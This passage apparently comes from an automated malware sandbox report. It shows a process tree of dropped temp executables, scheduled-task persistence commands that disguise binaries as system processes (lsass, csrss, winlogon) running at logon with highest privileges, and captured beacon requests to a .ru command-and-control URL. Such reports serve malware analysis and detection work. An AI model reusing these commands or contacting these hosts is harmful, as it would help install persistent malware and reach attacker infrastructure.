        "C:\Users\Admin\AppData\Local\Temp\tmp8529.tmp.exe"
        15⤵
        Executes dropped EXE
        
        PID:4700
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7c31e641-6c0b-4820-a1a2-3e9a6b7be0bd.vbs"
        12⤵
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\tmp65F8.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp65F8.tmp.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\tmp65F8.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp65F8.tmp.exe"
        13⤵
        Executes dropped EXE
        
        PID:4252
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f9fd7037-cb5a-42db-a49d-e399798bf213.vbs"
        10⤵
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\tmp48FB.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp48FB.tmp.exe"
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2100
        
        C:\Users\Admin\AppData\Local\Temp\tmp48FB.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp48FB.tmp.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:860
        
        C:\Users\Admin\AppData\Local\Temp\tmp48FB.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp48FB.tmp.exe"
        12⤵
        Executes dropped EXE
        
        PID:4264
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3069fc8b-8b05-429b-8e6d-8f6e29168b2c.vbs"
        8⤵
        
        PID:3952
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3d2e6c1c-ccd9-4e26-8ba8-83cd5f691ba4.vbs"
        6⤵
        
        PID:64
      - C:\Users\Admin\AppData\Local\Temp\tmpFBA6.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpFBA6.tmp.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:640
        
        C:\Users\Admin\AppData\Local\Temp\tmpFBA6.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpFBA6.tmp.exe"
        7⤵
        Executes dropped EXE
        
        PID:4248
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\81ad4c7b-4198-4aef-b362-64f220940e57.vbs"
      4⤵
      PID:1288
  - - C:\Users\Admin\AppData\Local\Temp\tmpCA93.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmpCA93.tmp.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4748
    - - C:\Users\Admin\AppData\Local\Temp\tmpCA93.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpCA93.tmp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3524
      - C:\Users\Admin\AppData\Local\Temp\tmpCA93.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpCA93.tmp.exe"
        6⤵
        Executes dropped EXE
        
        PID:1412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Windows\Performance\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Performance\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Windows\Performance\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Install\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Windows\Logs\HomeGroup\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Logs\HomeGroup\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Windows\Logs\HomeGroup\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Windows\es-ES\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\es-ES\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Windows\es-ES\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\schemas\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\schemas\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\schemas\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files\VideoLAN\VLC\lua\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\lua\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\VideoLAN\VLC\lua\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1308

Network

DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

36.56.20.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

36.56.20.217.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

140.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.32.126.40.in-addr.arpa

IN PTR

Response
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response
DNS

81888.cllt.nyashteam.ru

sihost.exe

Remote address:

8.8.8.8:53

Request

81888.cllt.nyashteam.ru

IN A

Response

81888.cllt.nyashteam.ru

IN A

104.21.2.8

81888.cllt.nyashteam.ru

IN A

172.67.186.200
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:16:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJfOLq0HIltw4U2e0gCejGrDr0ygGlfZAEoQnC582H77dDNbNdp7%2F8ES0wVrN%2BhtRIP98CbGz2ovFYfu5%2B5HgViBtv3Zku3SD6aKRsSPGFar4KvZXjnPTT6qyLz%2BYY9xWq7ZmhvsJmcioQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c208441481a417c-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z0umrEhMB=0KT2X8lvTQ5wT3fyVw6ZMM HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:16:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WofnKGt74jiM8oeTdW7f4ZQtdOsr3jyjeNQnKs1fAFClDcmDbO7b50CRIrpGzvhbDvgT1EFsqNgYbP5Eyhxd9Tfe1nfGr1R6wgEuP8NKGd2TQzS3ZOpk2Ys%2F9DMdT9r9bJPZfvfKzWOGFw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c208442aa1c417c-LHR
alt-svc: h2=":443"; ma=60
DNS

8.2.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.2.21.104.in-addr.arpa

IN PTR

Response
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?rWRA=FCxTfIgsg3jlRqQsf2hs0A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&rWRA=FCxTfIgsg3jlRqQsf2hs0A

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?rWRA=FCxTfIgsg3jlRqQsf2hs0A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&rWRA=FCxTfIgsg3jlRqQsf2hs0A HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:16:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UPZx%2FKLUn4wjxcX8o1pyo%2FJlahoSkqmzFCAbVjSr%2BtT61H7cA%2F3GFXRoNwR5Ui%2FTg7sJjG%2FMjWT7Bp%2Fn3l9MCa4cC9KvbcpNFIFfIsMuKaE0m3ukWUP24sR6sP2bcTHafRDfuRwp9%2BC7WQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c20848e1ad9cd19-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?rWRA=FCxTfIgsg3jlRqQsf2hs0A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&rWRA=FCxTfIgsg3jlRqQsf2hs0A

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?rWRA=FCxTfIgsg3jlRqQsf2hs0A&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&rWRA=FCxTfIgsg3jlRqQsf2hs0A HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:16:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BRRfda3uWyLknU%2FCRKGB8jzk7iTWD7neR6xKG%2FMLKC%2BQjUz8ExjoKpyV3Ikog5dd81CM9fhO6Mx9AHJXe%2BnY1AovE7rB1CCMYiHXgVo4GDnnpW5%2BtjNrT7BZeEyRz5D%2BbZIHMslmptinrA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c20848f8cbacd19-LHR
alt-svc: h2=":443"; ma=60
DNS

34.56.20.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

34.56.20.217.in-addr.arpa

IN PTR

Response
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GRupD7%2FXcLRzOeiFuHVUBNlnbgRbAKyets4FjBaTIT8T%2Fufi3ay%2F%2B8FN8VicyMjkXOw4n5ihDZxQtD3WdmDctRROeWIaPUZXDPkpIDG8x8uU0dYyipj8n13uQjqZjqQ9%2FLNWLNMzD1XRow%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2084c20a6863a0-LHR
alt-svc: h3=":443"; ma=86400
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&gHxQf79=3k&HUubsxXOpC1QLmyrbVRHRRtDFktUJq=gGaMsypHz HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JPmNNbv%2B%2B7surjRHAoqTkQJ5FjSRwFOx7U8JjXLkAQHnhxSg6dwrDm3ga578Bp1QPieluoosC7Th%2FMamNXJYXyZ4Zdslx%2BIFmhs%2FkWypaXRUxpGOTv3Um%2F9wVDCB%2FvVK9n9I9RUSBo5%2B%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2084c33bea63a0-LHR
alt-svc: h3=":443"; ma=86400
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UxU%2FZ314IHqmVhr8IcgyTA4RyuZ7Lkkq0YLC0UjhCVjIFw7nI%2FNQbzG8qHdN2zD69lyd0fN0ed4u62OuaT9mknKpvTvNswVbxUtfmBQGIIweGNXrFY5Cra19ZEPTITLRKMkhrAo8wx9RQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2084f91fc9beb9-LHR
alt-svc: h3=":443"; ma=86400
GET

